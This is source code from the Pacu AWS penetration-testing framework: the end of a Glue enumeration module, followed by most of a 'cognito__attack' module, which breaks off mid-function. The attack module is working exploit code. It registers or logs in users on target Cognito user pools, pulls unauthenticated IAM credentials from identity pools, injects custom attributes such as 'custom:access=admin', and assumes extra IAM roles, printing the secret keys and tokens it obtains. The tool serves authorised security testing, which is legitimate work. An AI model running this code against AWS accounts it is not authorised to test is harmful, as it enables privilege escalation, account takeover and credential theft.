        if args.dev_endpoints:
            dev_endpoints = fetch_glue_data(client, 'get_dev_endpoints', 'DevEndpoints', print)
            print('  {} development endpoint(s) found.'.format(len(dev_endpoints)))
            all_dev_endpoints += dev_endpoints

        # Jobs
        if args.jobs:
            jobs = fetch_glue_data(client, 'get_jobs', 'Jobs', print)
            print('  {} job(s) found.'.format(len(jobs)))
            all_jobs += jobs

    summary_data = {
        'connections': len(all_connections),
        'crawlers': len(all_crawlers),
        'databases': len(all_databases),
        'dev_endpoints': len(all_dev_endpoints),
        'jobs': len(all_jobs),
    }

    for var in vars(args):
        if var == 'regions':
            continue
        if not getattr(args, var):
            del summary_data[var]

    glue_data = deepcopy(session.Glue)
    glue_data['Connections'] = all_connections
    glue_data['Crawlers'] = all_crawlers
    glue_data['Databases'] = all_databases
    glue_data['DevEndpoints'] = all_dev_endpoints
    glue_data['Jobs'] = all_jobs
    session.update(pacu_main.database, Glue=glue_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    for key in data:
        out += '  {} total {}(s) found.\n'.format(data[key], key[:-1])
    out += '\n  Glue resources saved in Pacu database.\n'
    return out



import re
import base64
import webbrowser
import qrcode
import argparse
import json
from pycognito.aws_srp import AWSSRP
from typing import List, Dict
from pycognito.exceptions import SoftwareTokenMFAChallengeException
from copy import deepcopy
from botocore.exceptions import ClientError

# Using Spencer's iam_enum.py as a template

module_info = {
    # Name of the module (should be the same as the filename)
    "name": "cognito__attack",
    # Name and any other notes about the author
    "author": "David Kutz-Marks of Rhino Security Labs",
    # Category of the module. Make sure the name matches an existing category.
    "category": "EXPLOIT",
    # One liner description of the module functionality. This shows up when a user searches for modules.
    "one_liner": "Attacks user pool clients and identity pools by creating users and exploiting misconfigurations.",
    # Description about what the module does and how it works
    "description": (
        "Attempts to retrieve IAM credentials from identity pools, create (or log in) a Cognito "
        "user with each user pool client, search and modify custom user attributes, assume extra "
        "user roles, and obtain IAM credentials at each step to facilitate privilege escalation. A "
        "standard attack on an external AWS account requires four arguments: username, password, and "
        "user pool client or identity pool (ideally both). An attack on the current Pacu session's AWS "
        "account requires two arguments: username and password. If no other arguments are specified, "
        "cognito__enum will first be run to populate the Cognito database."
    ),
    # A list of AWS services that the module utilizes during its execution
    "services": ["cognito-idp", "cognito-identity"],
    # For prerequisite modules, try and see if any existing modules return the data that is
    # required for your module before writing that code yourself; that way, session data can stay separated and modular.
    "prerequisite_modules": ["cognito__enum"],
    # External resources that the module depends on. Valid options are either a GitHub URL (must end in .git) or single file URL.
    "external_dependencies": [],
    # Module arguments to autocomplete when the user hits tab
    "arguments_to_autocomplete": [
        "--regions",
        "--user_pools",
        "--user_pool_clients",
        "--identity_pools",
        "--email",
        "--username",
        "--password",
        "--user_attributes",
    ],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])
parser.add_argument(
    "--email",
    required=False,
    default=False,
    action="store",
    help="Email address to receive verification code (not always needed; this is sometimes sent to username).",
)
parser.add_argument(
    "--regions",
    required=False,
    default=None,
    help=(
        "Region(s) to target. Defaults to region(s) indicated in other arguments, "
        "and to Pacu Cognito database regions if none is found. Standard format (e.g. us-west-2)."
    ),
)
parser.add_argument(
    "--user_pools",
    required=False,
    default=False,
    action="store",
    help=(
        "User pool(s) to target. This will attempt to list their user pool clients and "
        "target them also. Defaults to user pools indicated in user pool clients argument, "
        "and to all session user pools if none is found. Standard format of REGION_GUID (e.g. us-west-2_uS2erhWzQ)."
    ),
)
parser.add_argument(
    "--user_pool_clients",
    required=False,
    default=False,
    action="store",
    help=(
        "User pool client(s) to target. Defaults to all session user pool clients. "
        "Format: ClientID@UserPoolID (e.g. 1june8@us-west-2_uS2erhWzQ)."
    ),
)
parser.add_argument(
    "--identity_pools",
    required=False,
    default=False,
    action="store",
    help=(
        "Identity pool(s) to target. Defaults to all session identity pools."
        "Standard format of 'REGION:GUID' and requires the single quotes due to colon "
        "(e.g. 'us-east-1:7dbbvc22-b905-4d75-9b2a-54ade5132076')."
    ),
)
parser.add_argument(
    "--username",
    required=False,
    default=False,
    action="store",
    help="Username for sign-up or login. Defaults to testuser.",
)
parser.add_argument(
    "--password",
    required=False,
    default=False,
    action="store",
    help="Password for sign-up or login. Defaults to TesPas808@!.",
)
parser.add_argument(
    "--user_attributes",
    required=False,
    default=[],
    action="store",
    help=(
        "User attributes for sign-up. "
        'Format: \'[{"Name":"given_name","Value":"lorem"},{"Name":"custom:access","Value":"admin"}]\''
    ),
)


ARG_FIELD_MAPPER = {
    "email": "Email",
    "user_pool_clients": "UserPoolClients",
    "user_pools": "UserPools",
    "identity_pools": "IdentityPools",
    "username": "Username",
    "password": "Password",
}


def main(args, pacu_main):
    attack_users = []
    all_new_regions = []
    attack_user_pool_clients = []
    cognito_identity_pools = []
    identity_pool = ""
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions

    up_clients = []

    if args.username is False:
        args.username = "testuser"

    if args.password is False:
        args.password = "TesPas808@!"

    if not args.user_pools and not args.user_pool_clients and not args.identity_pools:
        if not args.regions:
            regions = get_regions("cognito-idp")
            if regions is None or regions == [] or regions == "" or regions == {}:
                print(
                    "This module is not supported in any regions specified in the current session's region set. Exiting..."
                )
                return
            else:
                print("Using all session regions: " + ", ".join(regions))
        else:
            regions = args.regions.split(",")
            print("Using regions: " + ", ".join(regions))
        print(
            "No user pools, user pool clients, or identity pools specified. Using all user pool clients in Pacu session database."
        )
        if (
            fetch_data(
                ["Cognito", "UserPools"],
                module_info["prerequisite_modules"][0],
                f"--regions {','.join(regions)}",
            )
            is False
        ):
            print("Pre-req module failed, exiting...")
            return
        if (
            fetch_data(
                ["Cognito", "UserPoolClients"],
                module_info["prerequisite_modules"][0],
                f"--regions {','.join(regions)}",
            )
            is False
        ):
            print("Pre-req module failed, exiting...")
            return
        if (
            fetch_data(
                ["Cognito", "IdentityPools"],
                module_info["prerequisite_modules"][0],
                f"--regions {','.join(regions)}",
            )
            is False
        ):
            print("Pre-req module failed, exiting...")
            return
        up_clients = [
            client
            for client in session.Cognito["UserPoolClients"]
            if client["Region"] in regions
        ]
        cognito_identity_pools = session.Cognito["IdentityPools"]

    if not args.regions:
        regions = []

    if args.identity_pools:
        cognito_identity_pools = []
        if not args.regions:
            regions = []
        for identity_pool in args.identity_pools.split(","):
            new_identity_pool = {}
            region = identity_pool.split(":")[0]
            new_identity_pool["Region"] = region
            new_identity_pool["IdentityPoolId"] = identity_pool
            identity_client = pacu_main.get_boto3_client("cognito-identity", region)
            try:
                print("Attempting unauthenticated retrieval of identity Id credentials")
                identity_id = identity_client.get_id(IdentityPoolId=identity_pool)
                identity_creds = identity_client.get_credentials_for_identity(
                    IdentityId=identity_id["IdentityId"]
                )
                if identity_creds["Credentials"]["AccessKeyId"] is not None:
                    print("Access Key ID found.")
                    print(identity_creds["Credentials"]["AccessKeyId"])
                    new_identity_pool["AccessKeyId"] = identity_creds["Credentials"][
                        "AccessKeyId"
                    ]
                if identity_creds["Credentials"]["SecretKey"] is not None:
                    print("Secret Key found.")
                    new_identity_pool["SecretKey"] = identity_creds["Credentials"][
                        "SecretKey"
                    ]
                    print(identity_creds["Credentials"]["SecretKey"])
                if identity_creds["Credentials"]["SessionToken"] is not None:
                    print("Session Token found.")
                    new_identity_pool["SessionToken"] = identity_creds["Credentials"][
                        "SessionToken"
                    ]
                    print(identity_creds["Credentials"]["SessionToken"])
                if identity_creds["Credentials"]["Expiration"] is not None:
                    print("Expiration found.")
                    new_identity_pool["Expiration"] = identity_creds["Credentials"][
                        "Expiration"
                    ]
                    print(identity_creds["Credentials"]["Expiration"])
            except ClientError as error:
                code = error.response["Error"]["Code"]
                if code == "UnauthorizedOperation":
                    print("  Access denied to GetId or GetCredentialsForIdentity.")
                else:
                    print("  " + code)
                print("  Skipping identity pool enumeration...")

            cognito_identity_pools.append(new_identity_pool)

    if args.user_pools:
        if not args.regions:
            regions = []
        for user_pool in args.user_pools.split(","):
            region = user_pool.split("_")[0]
            client = pacu_main.get_boto3_client("cognito-idp", region)
            response = None
            next_token = None
            while response is None or next_token is not None:
                if next_token is None:
                    try:
                        print(
                            f"Trying to list original user pool clients for UserPoolId: {user_pool} in region {region}"
                        )
                        response = client.list_user_pool_clients(
                            UserPoolId=user_pool, MaxResults=60
                        )

                        for user_pool_client in response["UserPoolClients"]:
                            client_info = {}
                            print("User pool client found.")
                            client_info["ClientId"] = user_pool_client["ClientId"]
                            client_info["UserPoolId"] = user_pool_client["UserPoolId"]
                            client_info["Region"] = region
                            up_clients.append(client_info)
                            attack_user_pool_clients.append(client_info)

                        if "NextToken" in response:
                            next_token = response["NextToken"]

                    except ClientError as error:
                        code = error.response["Error"]["Code"]
                        print(response)
                        print("FAILURE: ")
                        if code == "UnauthorizedOperation":
                            print("  Access denied to ListUserPoolClients.")
                            break
                        elif code == "InvalidParameterException":  # Add this block
                            print("  InvalidParameterException")
                            print(f"  UserPoolId causing the issue: {user_pool}")
                            break
                        else:
                            print("  " + code)
                        print("  Skipping user pool client enumeration...")
                        break
                else:
                    try:
                        print(
                            f"Trying to list else-block user pool clients for UserPoolId: {user_pool}"
                        )
                        response = client.list_user_pool_clients(
                            NextToken=next_token, UserPoolId=user_pool, MaxResults=60
                        )

                        for user_pool_client in response["UserPoolClients"]:
                            client_info = {}
                            print("User pool client found.")
                            client_info["ClientId"] = user_pool_client["ClientId"]
                            client_info["UserPoolId"] = user_pool_client["UserPoolId"]
                            client_info["Region"] = region
                            up_clients.append(client_info)
                            attack_user_pool_clients.append(client_info)

                    except ClientError as error:
                        code = error.response["Error"]["Code"]
                        print("FAILURE: ")
                        if code == "UnauthorizedOperation":
                            print("  Access denied to ListUserPoolClients.")
                        elif code == "InvalidParameterException":  # Add this block
                            print("  InvalidParameterException")
                            print(f"  UserPoolId causing the issue: {user_pool}")
                            break
                        else:
                            print("  " + code)
                        print("  Skipping user pool client enumeration...")
                        break

                    if "NextToken" in response:
                        print("NextToken found.")
                        next_token = response["NextToken"]
                    else:
                        print("No NextToken found.")
                        break

            print(
                f"  {len(up_clients)} user pool client(s) found in user pool {user_pool}."
            )

    if args.user_pool_clients:
        for up_client in args.user_pool_clients.split(","):
            if "@" not in up_client:
                print(
                    'ERROR: User pool client names must be in the format "ClientID@UserPoolID" (e.g. 1june8@us-west-2_uS2erhWzQ).'
                )
                return {"error": "invalid usage"}
            up_clients.append(
                {
                    "ClientId": up_client.split("@")[0],
                    "UserPoolId": up_client.split("@")[1],
                    "Region": up_client.split("@")[1].split("_")[0],
                }
            )
            attack_user_pool_clients.append(
                {
                    "ClientId": up_client.split("@")[0],
                    "UserPoolId": up_client.split("@")[1],
                    "Region": up_client.split("@")[1].split("_")[0],
                }
            )

    if isinstance(args.user_attributes, str):
        args.user_attributes = parse_user_attributes(args.user_attributes)

    for up_client in up_clients:
        print(
            "Attempting to sign up user in user pool client "
            + up_client["ClientId"]
            + " in region "
            + up_client["Region"]
            + " . . . "
        )
        attack_user = {}
        attack_user["Tokens"] = {}
        attack_user["Credentials"] = {}
        aws = []
        aws2session = ""
        qr_img = []
        test = ""
        tokens = []
        client = pacu_main.get_boto3_client("cognito-idp", up_client["Region"])
        identity_client = pacu_main.get_boto3_client(
            "cognito-identity", up_client["Region"]
        )
        try:
            response = sign_up(
                client,
                args.email,
                up_client["ClientId"],
                args.username,
                args.password,
                args.user_attributes,
            )
        except Exception:
            test = "yes"

        if response is True or "exists" in str(response):
            if response is True:
                tokens = verify(
                    client,
                    args.username,
                    up_client["ClientId"],
                    up_client["UserPoolId"],
                    up_client["Region"],
                )
                all_new_regions.append(up_client["Region"])
            elif "yes" in test:
                print("User exists.")
            try:
                aws = AWSSRP(
                    username=args.username,
                    password=args.password,
                    pool_id=up_client["UserPoolId"],
                    client_id=up_client["ClientId"],
                    client=client,
                )
                tokens = aws.authenticate_user()
                if "AuthenticationResult" in tokens:
                    print("You're signed in as " + args.username + "!")
                    print(
                        "Your access token is: "
                        + tokens["AuthenticationResult"]["AccessToken"]
                    )
                    print(
                        "Your ID token is: " + tokens["AuthenticationResult"]["IdToken"]
                    )
                    print(
                        "Your refresh token is: "
                        + tokens["AuthenticationResult"]["RefreshToken"]
                    )
                    print(
                        "Your token type is: "
                        + tokens["AuthenticationResult"]["TokenType"]
                    )
                    attack_user["Username"] = args.username
                    attack_user["Region"] = up_client["Region"]
                    attack_user["UserPoolId"] = up_client["UserPoolId"]
                    attack_user["ClientId"] = up_client["ClientId"]
                    attack_user["Tokens"]["AccessToken"] = tokens[
                        "AuthenticationResult"
                    ]["AccessToken"]
                    attack_user["Tokens"]["IdToken"] = tokens["AuthenticationResult"][
                        "IdToken"
                    ]
                    attack_user["Tokens"]["RefreshToken"] = tokens[
                        "AuthenticationResult"
                    ]["RefreshToken"]
                    attack_user["Tokens"]["TokenType"] = tokens["AuthenticationResult"][
                        "TokenType"
                    ]
                    credentials = get_identity_credentials(
                        cognito_identity_pools,
                        identity_client,
                        tokens["AuthenticationResult"]["IdToken"],
                        up_client["UserPoolId"],
                        up_client["Region"],
                    )
                    if credentials is not None:
                        print("Temporary credentials retrieved!")
                        print(credentials)
                        attack_user["Credentials"]["AccessKeyId"] = credentials[
                            "AccessKeyId"
                        ]
                        attack_user["Credentials"]["SecretKey"] = credentials[
                            "SecretKey"
                        ]
                        attack_user["Credentials"]["SessionToken"] = credentials[
                            "SessionToken"
                        ]
                        attack_user["Credentials"]["Expiration"] = credentials[
                            "Expiration"
                        ]
                    new_tokens, new_credentials = get_custom_attributes(
                        client,
                        tokens,
                        args.password,
                        up_client["Region"],
                        up_client["ClientId"],
                        up_client["UserPoolId"],
                        cognito_identity_pools,
                        identity_client,
                        identity_pool,
                    )
                    attack_user["NewTokens"] = new_tokens
                    attack_user["NewCredentials"] = new_credentials
                    roles = get_assumable_roles(
                        tokens["AuthenticationResult"]["IdToken"]
                    )
                    attack_user["NewRoleTokens"] = prompt_assume_roles(
                        identity_client,
                        identity_pool,
                        roles,
                        region,
                        up_client["UserPoolId"],
                        tokens["AuthenticationResult"]["IdToken"],
                    )
                    if attack_user["NewRoleTokens"] is not None:
                        attack_user["NewRoleCredentials"] = attack_user["NewRoleTokens"]
                    attack_user_data = client.get_user(
                        AccessToken=tokens["AuthenticationResult"]["AccessToken"]
                    )
                    attack_user["UserAttributes"] = attack_user_data["UserAttributes"]
                    attack_users.append(attack_user)
                    continue
            except SoftwareTokenMFAChallengeException as error:
                try:
                    code = input(
                        "Please enter the MFA code generated by your application: "
                    )
                    print("Entering final MFA challenge")
                    error_string = str(error)
                    aws2session = re.search(r"'Session': '(.*?)'", error_string)
                    if aws2session:
                        aws2sessionfinal = aws2session.group(1)
                    else:
                        print("NO MATCH FOUND")
                        continue

                    tokens = client.respond_to_auth_challenge(
                        ClientId=up_client["ClientId"],
                        ChallengeName="SOFTWARE_TOKEN_MFA",
                        Session=aws2sessionfinal,
                        ChallengeResponses={
                            "USERNAME": args.username,
                            "SOFTWARE_TOKEN_MFA_CODE": code,
                        },
                    )
                except ClientError as err:
                    print(err)
                    continue
                print("You're signed in as " + args.username + "!")
                print(
                    "Your access token is: "
                    + tokens["AuthenticationResult"]["AccessToken"]
                )
                print("Your ID token is: " + tokens["AuthenticationResult"]["IdToken"])
                print(
                    "Your refresh token is: "
                    + tokens["AuthenticationResult"]["RefreshToken"]
                )
                print(
                    "Your token type is: " + tokens["AuthenticationResult"]["TokenType"]
                )
                attack_user["Username"] = args.username
                attack_user["Region"] = up_client["Region"]
                attack_user["UserPoolId"] = up_client["UserPoolId"]
                attack_user["ClientId"] = up_client["ClientId"]
                attack_user["Tokens"]["AccessToken"] = tokens["AuthenticationResult"][
                    "AccessToken"
                ]
                attack_user["Tokens"]["IdToken"] = tokens["AuthenticationResult"][
                    "IdToken"
                ]
                attack_user["Tokens"]["RefreshToken"] = tokens["AuthenticationResult"][
                    "RefreshToken"
                ]
                attack_user["Tokens"]["TokenType"] = tokens["AuthenticationResult"][
                    "TokenType"
                ]
                credentials = get_identity_credentials(
                    cognito_identity_pools,
                    identity_client,
                    tokens["AuthenticationResult"]["IdToken"],
                    up_client["UserPoolId"],
                    up_client["Region"],
                )
                if credentials is not None:
                    print("Temporary credentials retrieved!")
                    print(credentials)
                    attack_user["Credentials"]["AccessKeyId"] = credentials[
                        "AccessKeyId"
                    ]
                    attack_user["Credentials"]["SecretKey"] = credentials["SecretKey"]
                    attack_user["Credentials"]["SessionToken"] = credentials[
                        "SessionToken"
                    ]
                    attack_user["Credentials"]["Expiration"] = credentials["Expiration"]
                new_tokens, new_credentials = get_custom_attributes(
                    client,
                    tokens,
                    args.password,
                    up_client["Region"],
                    up_client["ClientId"],
                    up_client["UserPoolId"],
                    cognito_identity_pools,
                    identity_client,
                    identity_pool,
                )
                attack_user["NewTokens"] = new_tokens
                attack_user["NewCredentials"] = new_credentials
                roles = get_assumable_roles(tokens["AuthenticationResult"]["IdToken"])
                attack_user["NewRoleTokens"] = prompt_assume_roles(
                    identity_client,
                    identity_pool,
                    roles,
                    up_client["Region"],
                    up_client["UserPoolId"],
                    tokens["AuthenticationResult"]["IdToken"],
                )
                if attack_user["NewRoleTokens"] is not None:
                    attack_user["NewRoleCredentials"] = attack_user["NewRoleTokens"]
                if new_tokens is None:
                    attack_user_data = client.get_user(
                        AccessToken=tokens["AuthenticationResult"]["AccessToken"]
                    )
                    attack_user["UserAttributes"] = attack_user_data["UserAttributes"]
                    attack_users.append(attack_user)
                continue

            if tokens["ChallengeName"] == "MFA_SETUP":
                try:
                    print("First, we need to set up an MFA application.")
                    associate_token_response = client.associate_software_token(
                        Session=tokens["Session"]
                    )
                    qr_img = qrcode.make(
                        f"otpauth://totp/{args.username}?secret={associate_token_response['SecretCode']}"
                    )
                    qr_img.save("qr.png")
                    print(
                        "A QR code has been generated for you. Please scan it with your MFA application."
                    )
                    try:
                        webbrowser.open("qr.png")
                    except Exception:
                        print(
                            "Something went wrong when opening the file. Note that this cannot be done as root."
                            "Please manually open qr.png in the working directory to scan the QR code."
                        )
                        continue

                    mfa_code = input(
                        "Please enter the MFA code generated by your application: "
                    )
                    client.verify_software_token(
                        Session=associate_token_response["Session"], UserCode=mfa_code
                    )
                    print("Now that an MFA application is set up, let's sign in again.")
                    print(
                        "You will have to wait for a NEW MFA code to appear in your MFA application."
                    )
                    try:
                        aws2 = AWSSRP(
                            username=args.username,
                            password=args.password,
                            pool_id=up_client["UserPoolId"],
                            client_id=up_client["ClientId"],
                            client=client,
                        )
                        tokens = aws2.authenticate_user()
                    except SoftwareTokenMFAChallengeException as error:
                        try:
                            code = input(
                                "Please enter the MFA code generated by your application: "
                            )
                            print("Entering final MFA challenge")
                            error_string = str(error)
                            aws2session = re.search(r"'Session': '(.*?)'", error_string)
                            if aws2session:
                                aws2sessionfinal = aws2session.group(1)
                            else:
                                print("NO MATCH FOUND")
                                continue

                            tokens = client.respond_to_auth_challenge(
                                ClientId=up_client["ClientId"],
                                ChallengeName="SOFTWARE_TOKEN_MFA",
                                Session=aws2sessionfinal,
                                ChallengeResponses={
                                    "USERNAME": args.username,
                                    "SOFTWARE_TOKEN_MFA_CODE": code,
                                },
                            )
                        except ClientError as err:
                            print(err)
                            continue
                    print("You're signed in as " + args.username + "!")
                    print(
                        "Your access token is: "
                        + tokens["AuthenticationResult"]["AccessToken"]
                    )
                    print(
                        "Your ID token is: " + tokens["AuthenticationResult"]["IdToken"]
                    )
                    print(
                        "Your refresh token is: "
                        + tokens["AuthenticationResult"]["RefreshToken"]
                    )
                    print(
                        "Your token type is: "
                        + tokens["AuthenticationResult"]["TokenType"]
                    )
                    attack_user["Username"] = args.username
                    attack_user["Region"] = up_client["Region"]
                    attack_user["UserPoolId"] = up_client["UserPoolId"]
                    attack_user["ClientId"] = up_client["ClientId"]
                    attack_user["Tokens"]["AccessToken"] = tokens[
                        "AuthenticationResult"
                    ]["AccessToken"]
                    attack_user["Tokens"]["IdToken"] = tokens["AuthenticationResult"][
                        "IdToken"
                    ]
                    attack_user["Tokens"]["RefreshToken"] = tokens[
                        "AuthenticationResult"
                    ]["RefreshToken"]
                    attack_user["Tokens"]["TokenType"] = tokens["AuthenticationResult"][
                        "TokenType"
                    ]
                    credentials = get_identity_credentials(
                        cognito_identity_pools,
                        identity_client,
                        tokens["AuthenticationResult"]["IdToken"],
                        up_client["UserPoolId"],
                        up_client["Region"],
                    )
                    if credentials is not None:
                        print("Temporary credentials retrieved!")
                        print(credentials)
                        attack_user["Credentials"]["AccessKeyId"] = credentials[
                            "AccessKeyId"
                        ]
                        attack_user["Credentials"]["SecretKey"] = credentials[
                            "SecretKey"
                        ]
                        attack_user["Credentials"]["SessionToken"] = credentials[
                            "SessionToken"
                        ]
                        attack_user["Credentials"]["Expiration"] = credentials[
                            "Expiration"
                        ]
                    new_tokens, new_credentials = get_custom_attributes(
                        client,
                        tokens,
                        args.password,
                        up_client["Region"],
                        up_client["ClientId"],
                        up_client["UserPoolId"],
                        cognito_identity_pools,
                        identity_client,
                        identity_pool,
                    )
                    attack_user["NewTokens"] = new_tokens
                    attack_user["NewCredentials"] = new_credentials
                    roles = get_assumable_roles(
                        tokens["AuthenticationResult"]["IdToken"]
                    )
                    attack_user["NewRoleTokens"] = prompt_assume_roles(
                        identity_client,
                        identity_pool,
                        roles,
                        region,
                        up_client["UserPoolId"],
                        tokens["AuthenticationResult"]["IdToken"],
                    )
                    if attack_user["NewRoleTokens"] is not None:
                        print(
                            "New role tokens retrieved! Attempting to receive temporary credentials from identity pool."
                        )
                        new_role_credentials = get_identity_credentials(
                            cognito_identity_pools,
                            identity_client,
                            attack_user["NewRoleTokens"]["IdToken"],
                            up_client["UserPoolId"],
                            up_client["Region"],
                        )
                        attack_user["NewRoleCredentials"] = new_role_credentials
                    if new_tokens is None:
                        attack_user_data = client.get_user(
                            AccessToken=tokens["AuthenticationResult"]["AccessToken"]
                        )
                        attack_user["UserAttributes"] = attack_user_data[
                            "UserAttributes"
                        ]
                        attack_users.append(attack_user)
                    if new_tokens is not None:
                        attack_user_data = client.get_user(
                            AccessToken=new_tokens["AuthenticationResult"][
                                "AccessToken"
                            ]
                        )
                        attack_user["UserAttributes"] = attack_user_data[
                            "UserAttributes"
                        ]
                        attack_users.append(attack_user)
                    continue

                except ClientError as err:
                    print(err)
                    continue
            elif tokens["ChallengeName"] == "SOFTWARE_TOKEN_MFA":
                code = input(
                    "Please enter the MFA code generated by your application: "
                )
                tokens = client.verify_software_token(
                    Session=associate_token_response["Session"], UserCode=mfa_code
                )
                print("You're signed in as " + args.username + "!")
                print(
                    "Your access token is: "
                    + tokens["AuthenticationResult"]["AccessToken"]
                )
                print("Your ID token is: " + tokens["AuthenticationResult"]["IdToken"])
                print(
                    "Your refresh token is: "
                    + tokens["AuthenticationResult"]["RefreshToken"]
                )
                print(
                    "Your token type is: " + tokens["AuthenticationResult"]["TokenType"]
                )
                attack_user["Username"] = args.username
                attack_user["Region"] = up_client["Region"]
                attack_user["UserPoolId"] = up_client["UserPoolId"]
                attack_user["ClientId"] = up_client["ClientId"]
                attack_user["Tokens"]["AccessToken"] = tokens["AuthenticationResult"][
                    "AccessToken"
                ]
                attack_user["Tokens"]["IdToken"] = tokens["AuthenticationResult"][
                    "IdToken"
                ]
                attack_user["Tokens"]["RefreshToken"] = tokens["AuthenticationResult"][
                    "RefreshToken"
                ]
                attack_user["Tokens"]["TokenType"] = tokens["AuthenticationResult"][
                    "TokenType"
                ]
                credentials = get_identity_credentials(
                    cognito_identity_pools,
                    identity_client,
                    tokens["AuthenticationResult"]["IdToken"],
                    up_client["UserPoolId"],
                    up_client["Region"],
                )
                if credentials is not None:
                    print("Temporary credentials retrieved!")
                    print(credentials)
                    attack_user["Credentials"]["AccessKeyId"] = credentials[
                        "AccessKeyId"
                    ]
                    attack_user["Credentials"]["SecretKey"] = credentials["SecretKey"]
                    attack_user["Credentials"]["SessionToken"] = credentials[
                        "SessionToken"
                    ]
                    attack_user["Credentials"]["Expiration"] = credentials["Expiration"]
                new_tokens, new_credentials = get_custom_attributes(
                    client,
                    tokens,
                    args.password,
                    up_client["Region"],
                    up_client["ClientId"],
                    up_client["UserPoolId"],
                    cognito_identity_pools,
                    identity_client,
                    identity_pool,
                )
                attack_user["NewTokens"] = new_tokens
                attack_user["NewCredentials"] = new_credentials
                roles = get_assumable_roles(tokens["AuthenticationResult"]["IdToken"])
                attack_user["NewRoleTokens"] = prompt_assume_roles(
                    identity_client,
                    identity_pool,
                    roles,
                    region,
                    up_client["UserPoolId"],
                    tokens["AuthenticationResult"]["IdToken"],
                )
                if attack_user["NewRoleTokens"] is not None:
                    print(
                        "New role tokens retrieved! Attempting to receive temporary credentials from identity pool."
                    )
                    new_role_credentials = get_identity_credentials(
                        cognito_identity_pools,
                        identity_client,
                        attack_user["NewRoleTokens"]["IdToken"],
                        up_client["UserPoolId"],
                        up_client["Region"],
                    )
                    attack_user["NewRoleCredentials"] = new_role_credentials
                attack_user_data = client.get_user(
                    AccessToken=tokens["AuthenticationResult"]["AccessToken"]
                )
                attack_user["UserAttributes"] = attack_user_data["UserAttributes"]
                attack_users.append(attack_user)
                break

    if regions != []:
        print("Running cognito__enum again to add new users to Pacu database.")
        if (
            fetch_data(
                ["Cognito", "NewUsers"],
                module_info["prerequisite_modules"][0],
                f"--regions {','.join(regions)}",
            )
            is False
        ):
            print("Pre-req module second attempt failed, exiting...")

    search_string = "custom"

    choice = input("List all custom attributes for all users in all user pools (y/n)?")
    if choice.lower() == "y" and session.Cognito["UsersInPools"] is not None:
        for user in session.Cognito["UsersInPools"]:
            if any(
                search_string in attribute["Name"] for attribute in user["Attributes"]
            ):
                print("Custom attribute(s) found for user" + user["Username"] + "!")
                print(user["Attributes"])

    gathered_data = {
        "Attack_UserPoolClients": attack_user_pool_clients,
        "Attack_IdentityPools": cognito_identity_pools,
        "Attack_Users": attack_users,
    }

    for var in vars(args):
        if var == "regions":
            continue
        if not getattr(args, var) and ARG_FIELD_MAPPER[var] in gathered_data:
            del gathered_data[ARG_FIELD_MAPPER[var]]

    cognito_data = deepcopy(session.Cognito)
    for key, value in gathered_data.items():
        cognito_data[key] = value
    session.update(pacu_main.database, Cognito=cognito_data)


def validate_json_data(data, schema):
    if not isinstance(data, dict):
        return False

    for key in schema["required"]:
        if key not in data:
            return False

    for key, value in data.items():
        if key in schema["properties"] and not isinstance(
            value, schema["properties"][key]["type"]
        ):
            return False

    return True


def parse_user_attributes(user_attributes: str) -> List[Dict[str, str]]:
    try:
        json_data = json.loads(user_attributes)
    except json.decoder.JSONDecodeError:
        print("Provided user attributes could not be parsed. Please check your format.")
        raise

    schema = {
        "required": ["Name", "Value"],
        "properties": {"Name": {"type": str}, "Value": {"type": str}},
    }

    for obj in json_data:

        if validate_json_data(obj, schema) is False:
            print("Provided user attributes are not valid. Please check your format.")
            raise

    return json_data


def sign_up(client, email, client_id, username, password, user_attributes=None):
    user_attributes = user_attributes or []
    email_exists = any(attribute["Name"] == "email" for attribute in user_attributes)

    if email and not email_exists:
        user_attributes.append({"Name": "email", "Value": email})

    try:
        client.sign_up(
            ClientId=client_id,
            Username=username,
            Password=password,
            UserAttributes=user_attributes,
        )
        print(f"Successfully signed up user {username}.")
        return True
    except client.exceptions.UsernameExistsException:
        print(f"Username {username} already exists. Attempting to log in.")
        return "exists"
    except client.exceptions.InvalidParameterException as e:
        error_message = str(e)
        print(error_message)
        if "attribute is required" in error_message:
            parameter = re.search(
                r"schema: (.*?): The attribute is required", error_message
            )
            if parameter:
                attribute_name = parameter.group(1)
                param_value = input(f"Enter value for {attribute_name}: ")
                user_attributes.append({"Name": attribute_name, "Value": param_value})
                return sign_up(
                    client, email, client_id, username, password, user_attributes
                )
        else:
            print(f"Invalid parameter: {str(e)}")
            param_name = input("Please enter the name of the invalid parameter: ")
            param_value = input("Please enter the value of the invalid parameter: ")
            if param_name.lower() in ["username", "password"]:
                return sign_up(
                    client,
                    email,
                    client_id,
                    param_name.lower() == "username" and param_value or username,
                    param_name.lower() == "password" and param_value or password,
                    user_attributes,
                )
            user_attributes.append({"Name": param_name, "Value": param_value})
            return sign_up(
                client, email, client_id, username, password, user_attributes
            )
    except Exception as e:
        print(f"Error signing up user {username}: {str(e)}")
        return False


def verify(client, username, client_id, user_pool_id, region):
    prompt = (
        f"Enter verification code for user {username} in user pool client {client_id}: "
    )
    code = input(prompt)
    try:
        response = client.confirm_sign_up(
            ClientId=client_id, Username=username, ConfirmationCode=code
        )
        print(f"Successfully verified user {username}")
    except client.exceptions.UserNotFoundException:
        print(f"User {username} not found")
        return False
    except client.exceptions.CodeMismatchException:
        print(f"Invalid verification code {code}")
        return False
    except Exception as e:
        print(f"Error verifying user {username}: {str(e)}")
        return False

    return response


def get_assumable_roles(id_token):
    id_token_payload = id_token.split(".")[1]
    id_token_payload += "=" * (-len(id_token_payload) % 4)
    id_token_payload_decoded = base64.b64decode(id_token_payload)
    id_token_payload_json = json.loads(id_token_payload_decoded)
    roles = id_token_payload_json.get("cognito:roles", [])
    print("This user can assume the following roles:" + str(roles))
    return roles


def prompt_assume_roles(
    identity_client, identity_pool, roles, region, user_pool_id, id_token
):
    for i, role in enumerate(roles):
        print(f"{i + 1}. {role}")
    choice = input('Enter the number of the role you want to assume (or "n" to skip): ')
    if choice.lower() == "n":
        return False
    try:
        index = int(choice) - 1
        if 0 <= index < len(roles):
            logins = {
                "cognito-idp." + region + ".amazonaws.com/" + user_pool_id: id_token
            }
            identity_id = identity_client.get_id(IdentityPoolId=identity_pool)
            new_role = identity_client.get_credentials_for_identity(
                IdentityId=identity_id["IdentityId"],
                Logins=logins,
                CustomRoleArn=roles[index],
            )
